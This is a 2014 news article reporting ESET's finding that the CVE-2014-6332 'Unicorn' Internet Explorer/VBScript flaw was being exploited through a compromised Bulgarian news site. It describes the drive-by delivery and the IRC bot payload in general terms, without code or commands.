Proof-of-concept code makes things easy for cybercriminals

Nov 21, 2014 09:19 GMT  ·  By
Web page containing the malicious iframe redirecting to the exploit
5 photos
   Web page containing the malicious iframe redirecting to the exploit

An exploit for the recently discovered vulnerability present in Microsoft’s operating system since Windows 95 has been found on a popular website for a news agency in Bulgaria.

The security flaw has been dubbed the “Unicorn” bug (identified as CVE-2014-6332) because of its rarity and is believed to be in test mode at the moment since there is only one compromised page on the site.

Demo code helps the threat actor

According to security researchers from ESET, this is the first reference of the glitch being exploited in the wild. The cybercriminals did not create the exploit themselves, but relied on proof-of-concept (PoC) code that emerged at the beginning of the week from a Chinese researcher, after adapting it for their needs.

Researchers at IBM’s X-Force found the 19-year-old bug in the Windows code and say that it has been remotely exploitable for the past 18 years, since the introduction of VBScript support in Internet Explorer 3.0.

They said that the weakness resisted all modifications and security measures included in Internet Explorer, as it was not affected in any way by the Enhanced Protected Mode (EPM) in IE 11 or by the exploit mitigation tactics used by Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) anti-exploit utility.

It appears that taking advantage of the flaw is not an easy thing to do, one hurdle being to place arbitrary data in the storage location of VBScript arrays on the IE heap; another obstacle would be Variant type compatibility verification when addressing outside the bounds of the VBScript array (Safe Arrays).

However, the availability of demo code made the work of cybercriminals much easier, allowing them to just modify parts of it to fit their purpose.

Exploit and payload hosted on Russian website

ESET researchers say that infecting the computers is done through drive-by download, with a malicious iframe injected in the HTML page pointing to an exploit kit (EK). They could not identify the EK, but even so, the threat is detected by the company’s products as Win32/Exploit.CVE-2014-6332.A.

It seems that the threat actors created two payloads that retrieve malware from two different resources. One consists in commands executed in the Command Prompt and results in downloading an executable file (natmasla.exe) from an FTP location; the other has the same result, but PowerShell is used to get the binary, which is hosted on a site in Russia (natmasla[.]ru).

The executable has been analyzed by the experts and it is a versatile piece of malware (Win32/IRCBot.NHR) that can be employed in activities ranging from DDoS attacks to opening remote shells on the compromised system.

Researchers also found a quotation from Einstein in the malware code: “Anyone who has never made a mistake has never tried anything new.”

Given the availability of the PoC, it is not far-fetched to assume that more attacks leveraging this vulnerability are to come.

Microsoft patched the vulnerability and pushed the fix to users through the Windows Update mechanism, but applying it depends entirely on the end-user.

Exploiting the Unicorn bug (5 Images)

Web page containing the malicious iframe redirecting to the exploit
The exploit is hosted on Russian websiteStrings crediting the PoC author
+2more